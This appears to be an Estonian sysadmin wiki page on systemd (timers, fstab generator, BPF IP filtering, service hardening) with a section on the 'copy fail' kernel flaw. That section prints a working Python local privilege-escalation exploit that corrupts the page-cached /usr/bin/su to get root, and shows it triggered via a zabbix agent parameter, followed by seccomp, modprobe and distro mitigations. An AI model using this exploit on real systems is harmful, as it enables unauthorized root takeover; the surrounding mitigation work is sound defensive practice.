-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su' - nt lugedes faili tavalisel viisil satub tema sisu page cache'i
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus) - see on võimalik tänu eksploidi toimimisele - üldiselt on linux kerneli lubadus selline, et kui protsess (privilegeerimata protsess antud juhul) ei saa failisüsteemis faili muuta, siis ei saa ta tegeleda ka cache'itud vastava faili sisuga)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega, mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (asuvad arvuti mälus)

|
v

vfs (virtual file system) (asub arvuti mälus)

|
v

page cache (asub arvuti mälus)

|
v

ext4 filesystem (asub plokkseadmel)

|
v

plokkseade (asub nö füüsilisel esemel)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

Leevenduste iseloomustus

* systemd (seccomp) - operatsioonisüsteemi syscall liidesel asuv nö tulemüür, mingis mõttes asub kerneli protsesside poole vaatavas osas
* apparmor (lsm - linux security modules)- erinevate süsteemi võimekustele ligipääsemise takistamised (asub kerneli protsesside poole vaatavast osast teisel pool)
* modprobe - kerneli funktsionaalsust realiseeriv komponent (kahe esimese puhul ei saa funktsionaalust kasutada isegi kui kernelis on see iseenest kohal)

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

Tulemus paistab selline

<pre>
root@moraal:~# uname -a
Linux moraal 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux

root@moraal:~# modprobe algif_aead
modprobe: ERROR: ../libkmod/libkmod-module.c:1084 command_do() Error running install command '/bin/false' for module algif_aead: retcode 1
modprobe: ERROR: could not insert 'algif_aead': Invalid argument
</pre>

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html

Proxmox v. 8 kasutamine

2026-05-05T04:23:50Z

Imre: /* proxmox-boot-tool kasutamine - bootctl -> grub */

===Sissejuhatus===

TODO

===proxmox-boot-tool kasutamine - bootctl===

<pre>
